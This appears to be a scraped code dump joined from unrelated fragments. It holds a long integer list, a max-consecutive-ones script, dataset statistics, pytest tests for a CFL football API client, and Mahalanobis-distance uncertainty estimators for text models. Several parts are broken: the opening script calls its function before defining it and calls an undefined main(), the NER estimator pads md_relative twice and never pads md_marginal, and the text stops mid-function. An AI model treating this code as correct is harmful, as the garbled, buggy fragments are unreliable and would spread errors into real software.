,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]
output = findMaxConsecutiveOnes(input)
print(output)
def findMaxConsecutiveOnes(nums):
globalMax = 0
count = 0
if (len(nums) == 0):
return 0
for n in nums:
if n == 1:
count = count +n
if(count > globalMax):
globalMax = count
elif n==0:
count = 0
return globalMax
if __name__ == '__main__':
main()
| 817.44
| 20,013
| 0.500196
| 10,047
| 20,436
| 1.016622
| 0.001891
| 1.956334
| 2.933033
| 3.908753
| 0.979048
| 0.979048
| 0.979048
| 0.979048
| 0.979048
| 0.979048
| 0
| 0.493783
| 0.008319
| 20,436
| 24
| 20,014
| 851.5
| 0.010214
| 0
| 0
| 0.105263
| 0
| 0
| 0.000392
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0
| 0
| 0.210526
| 0.052632
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
5cff7413f5a21b7876c160ba6fc46a4379049e9b
| 3,052
|
py
|
Python
|
test/test_cflapi_players.py
|
streibeb/cflapi
|
4e0bf609bab94f0f8c7f623409de7fa16bad2f78
|
[
"MIT"
] | 4
|
2018-08-21T21:44:09.000Z
|
2020-02-18T13:09:17.000Z
|
test/test_cflapi_players.py
|
streibeb/cflapi
|
4e0bf609bab94f0f8c7f623409de7fa16bad2f78
|
[
"MIT"
] | null | null | null |
test/test_cflapi_players.py
|
streibeb/cflapi
|
4e0bf609bab94f0f8c7f623409de7fa16bad2f78
|
[
"MIT"
] | null | null | null |
from test import *
PLAYER_ID = 159141
def test_get_players(response_keys):
api = CFLApi(API_KEY)
response = api.getPlayers()
assert isinstance(response, dict)
assert set(response_keys).issubset(response.keys()), "All keys should be in the response"
def test_get_player(response_keys):
api = CFLApi(API_KEY)
response = api.getPlayer(PLAYER_ID)
assert isinstance(response, dict)
assert set(response_keys).issubset(response.keys()), "All keys should be in the response"
assert response['data'][0]['cfl_central_id'] == PLAYER_ID
def test_get_player_include_seasons(response_keys):
api = CFLApi(API_KEY)
response = api.getPlayer(PLAYER_ID, include='seasons')
assert isinstance(response, dict)
assert set(response_keys).issubset(response.keys()), "All keys should be in the response"
assert response['data'][0]['cfl_central_id'] == PLAYER_ID
assert isinstance(response['data'][0]['seasons'], dict)
def test_get_player_include_game_by_game(response_keys):
api = CFLApi(API_KEY)
response = api.getPlayer(PLAYER_ID, include='game_by_game')
assert isinstance(response, dict)
assert set(response_keys).issubset(response.keys()), "All keys should be in the response"
assert response['data'][0]['cfl_central_id'] == PLAYER_ID
assert isinstance(response['data'][0]['game_by_game'], dict)
def test_get_player_include_seasons_and_game_by_game(response_keys):
api = CFLApi(API_KEY)
response = api.getPlayer(PLAYER_ID, include=['seasons','game_by_game'])
assert isinstance(response, dict)
assert set(response_keys).issubset(response.keys()), "All keys should be in the response"
assert response['data'][0]['cfl_central_id'] == PLAYER_ID
assert isinstance(response['data'][0]['seasons'], dict)
assert isinstance(response['data'][0]['game_by_game'], dict)
def test_get_players_sort_by_birth_date_asc(response_keys):
api = CFLApi(API_KEY)
response = api.getPlayers(sort='birth_date')
assert isinstance(response, dict)
assert set(response_keys).issubset(response.keys()), "All keys should be in the response"
firstGame, lastGame = response['data'][0], response['data'][-1]
assert firstGame['birth_date'] <= lastGame['birth_date']
def test_get_players_sort_by_height_desc(response_keys):
api = CFLApi(API_KEY)
response = api.getPlayers(sort='-height')
assert isinstance(response, dict)
assert set(response_keys).issubset(response.keys()), "All keys should be in the response"
firstGame, lastGame = response['data'][0], response['data'][-1]
assert firstGame['height'] >= lastGame['height']
def test_get_players_filter_by_position_abbreviation(response_keys):
api = CFLApi(API_KEY)
response = api.getPlayers(filter={'position_abbreviation': {'eq': 'QB'}})
assert isinstance(response, dict)
assert set(response_keys).issubset(response.keys()), "All keys should be in the response"
for player in response['data']:
assert player['position']['abbreviation'] == 'QB'
| 40.157895
| 93
| 0.724443
| 414
| 3,052
| 5.113527
| 0.120773
| 0.136042
| 0.136042
| 0.079358
| 0.86821
| 0.86821
| 0.816722
| 0.816722
| 0.816722
| 0.771375
| 0
| 0.006894
| 0.144495
| 3,052
| 75
| 94
| 40.693333
| 0.803907
| 0
| 0
| 0.607143
| 0
| 0
| 0.180865
| 0.006881
| 0
| 0
| 0
| 0
| 0.482143
| 1
| 0.142857
| false
| 0
| 0.017857
| 0
| 0.160714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf5d225b4d6d2eac6aaf83a46b7bc5747f325cde
| 9,541
|
py
|
Python
|
src/ue4nlp/ue_estimator_mahalanobis.py
|
AIRI-Institute/uncertainty_transformers
|
982b5ae8b39cb484ce3559a72f95d18f30487e38
|
[
"MIT"
] | null | null | null |
src/ue4nlp/ue_estimator_mahalanobis.py
|
AIRI-Institute/uncertainty_transformers
|
982b5ae8b39cb484ce3559a72f95d18f30487e38
|
[
"MIT"
] | null | null | null |
src/ue4nlp/ue_estimator_mahalanobis.py
|
AIRI-Institute/uncertainty_transformers
|
982b5ae8b39cb484ce3559a72f95d18f30487e38
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from tqdm import tqdm
import time
from utils.utils_heads import (
ElectraClassificationHeadIdentityPooler,
BertClassificationHeadIdentityPooler,
ElectraNERHeadIdentityPooler,
)
from utils.utils_inference import (
is_custom_head,
unpad_features,
pad_scores
)
from ue4nlp.mahalanobis_distance import (
mahalanobis_distance,
mahalanobis_distance_relative,
mahalanobis_distance_marginal,
compute_centroids,
compute_covariance
)
import logging
log = logging.getLogger()
class UeEstimatorMahalanobis:
def __init__(self, cls, ue_args, config, train_dataset):
self.cls = cls
self.ue_args = ue_args
self.config = config
self.train_dataset = train_dataset
def __call__(self, X, y):
return self._predict_with_fitted_cov(X, y)
def fit_ue(self, X, y=None, X_test=None):
cls = self.cls
model = self.cls._auto_model
log.info("****************Start fitting covariance and centroids **************")
if y is None:
y = self._exctract_labels(X)
self._replace_model_head()
X_features = self._exctract_features(X)
self.class_cond_centroids = self._fit_centroids(X_features, y)
self.class_cond_covariance = self._fit_covariance(X_features, y)
self.fit_all_md_versions = "fit_all_md_versions" in self.ue_args.keys() and self.ue_args.fit_all_md_versions
if self.fit_all_md_versions:
self.train_centroid = self._fit_centroids(X_features, y, class_cond=False)
self.train_covariance = self._fit_covariance(X_features, y, class_cond=False)
log.info("**************Done.**********************")
def _fit_covariance(self, X, y, class_cond=True):
if class_cond:
return compute_covariance(self.class_cond_centroids, X, y, class_cond)
return compute_covariance(self.train_centroid, X, y, class_cond)
def _fit_centroids(self, X, y, class_cond=True):
return compute_centroids(X, y, class_cond)
def _replace_model_head(self):
log.info("Change classifier to Identity Pooler")
cls = self.cls
model = self.cls._auto_model
use_paper_version = self.ue_args.get("use_paper_version", False) and not(self.ue_args.use_spectralnorm)
use_activation = not use_paper_version
if is_custom_head(model):
model.classifier = ElectraClassificationHeadIdentityPooler(model.classifier, use_activation)
else:
model.classifier = BertClassificationHeadIdentityPooler(model.classifier)
def _exctract_labels(self, X):
return np.asarray([example["label"] for example in X])
def _exctract_features(self, X):
cls = self.cls
model = self.cls._auto_model
try:
X = X.remove_columns("label")
except:
X.dataset = X.dataset.remove_columns("label")
X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0]
return X_features
def _predict_with_fitted_cov(self, X, y):
cls = self.cls
model = self.cls._auto_model
log.info("****************Compute MD with fitted covariance and centroids **************")
start = time.time()
if y is None:
y = self._exctract_labels(X)
X_features = self._exctract_features(X)
end = time.time()
eval_results = {}
md, inf_time = mahalanobis_distance(None, None, X_features,
self.class_cond_centroids, self.class_cond_covariance)
sum_inf_time = inf_time + (end - start)
eval_results["mahalanobis_distance"] = md.tolist()
eval_results["ue_time"] = sum_inf_time
log.info(f"UE time: {sum_inf_time}")
if self.fit_all_md_versions:
md_relative = mahalanobis_distance_relative(None, None, X_features,
self.train_centroid, self.train_covariance)
md_marginal = mahalanobis_distance_marginal(None, None, X_features,
self.class_cond_centroids, self.class_cond_covariance,
self.train_centroid, self.train_covariance)
eval_results["mahalanobis_distance_relative"] = md_relative.tolist()
eval_results["mahalanobis_distance_marginal"] = md_marginal.tolist()
log.info("**************Done.**********************")
return eval_results
class UeEstimatorMahalanobisNer:
def __init__(self, cls, ue_args, config, train_dataset):
self.cls = cls
self.ue_args = ue_args
self.config = config
self.train_dataset = train_dataset
def __call__(self, X, y):
return self._predict_with_fitted_cov(X, y)
def fit_ue(self, X, y=None, X_test=None):
cls = self.cls
model = self.cls._auto_model
log.info("****************Start fitting covariance and centroids **************")
if y is None:
y, y_shape = self._exctract_labels(X)
self._replace_model_head()
X_features = self._exctract_features(X)
X_features, y = unpad_features(X_features, y)
self.class_cond_centroids = self._fit_centroids(X_features, y)
self.class_cond_covariance = self._fit_covariance(X_features, y)
self.fit_all_md_versions = "fit_all_md_versions" in self.ue_args.keys() and self.ue_args.fit_all_md_versions
if self.fit_all_md_versions:
self.train_centroid = self._fit_centroids(X_features, y, class_cond=False)
self.train_covariance = self._fit_covariance(X_features, y, class_cond=False)
log.info("**************Done.**********************")
def _fit_covariance(self, X, y, class_cond=True):
if class_cond:
return compute_covariance(self.class_cond_centroids, X, y, class_cond)
return compute_covariance(self.train_centroid, X, y, class_cond)
def _fit_centroids(self, X, y, class_cond=True):
return compute_centroids(X, y, class_cond)
def _replace_model_head(self):
log.info("Change classifier to Identity Pooler")
cls = self.cls
model = self.cls._auto_model
use_paper_version = self.ue_args.get("use_paper_version", False) and not(self.ue_args.use_spectralnorm)
use_activation = not use_paper_version
if is_custom_head(model):
model.classifier = ElectraNERHeadIdentityPooler(model.classifier, use_activation)
else:
model.classifier = BertClassificationHeadIdentityPooler(model.classifier)
def _exctract_labels(self, X):
y = np.asarray([example["labels"] for example in X])
y_shape = y.shape
return y.reshape(-1), y_shape
def _exctract_features(self, X):
cls = self.cls
model = self.cls._auto_model
try:
X = X.remove_columns("labels")
except:
X.dataset = X.dataset.remove_columns("labels")
X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0]
X_features = X_features.reshape(-1, X_features.shape[-1])
return X_features
def _predict_with_fitted_cov(self, X, y):
cls = self.cls
model = self.cls._auto_model
log.info("****************Compute MD with fitted covariance and centroids **************")
start = time.time()
y_pad, y_shape = self._exctract_labels(X)
X_features = self._exctract_features(X)
X_features, y = unpad_features(X_features, y_pad)
end = time.time()
eval_results = {}
md, inf_time = mahalanobis_distance(None, None, X_features,
self.class_cond_centroids, self.class_cond_covariance)
md = pad_scores(md, np.asarray(y_pad).reshape(y_shape), y_pad)
sum_inf_time = inf_time + (end - start)
eval_results["mahalanobis_distance"] = md.tolist()
eval_results["ue_time"] = sum_inf_time
log.info(f"UE time: {sum_inf_time}")
if self.fit_all_md_versions:
md_relative = mahalanobis_distance_relative(None, None, X_features,
self.train_centroid, self.train_covariance)
md_relative = pad_scores(md_relative, np.asarray(y_pad).reshape(y_shape), y_pad)
md_marginal = mahalanobis_distance_marginal(None, None, X_features,
self.class_cond_centroids, self.class_cond_covariance,
self.train_centroid, self.train_covariance)
md_relative = pad_scores(md_relative, np.asarray(y_pad).reshape(y_shape), y_pad)
eval_results["mahalanobis_distance_relative"] = md_relative.tolist()
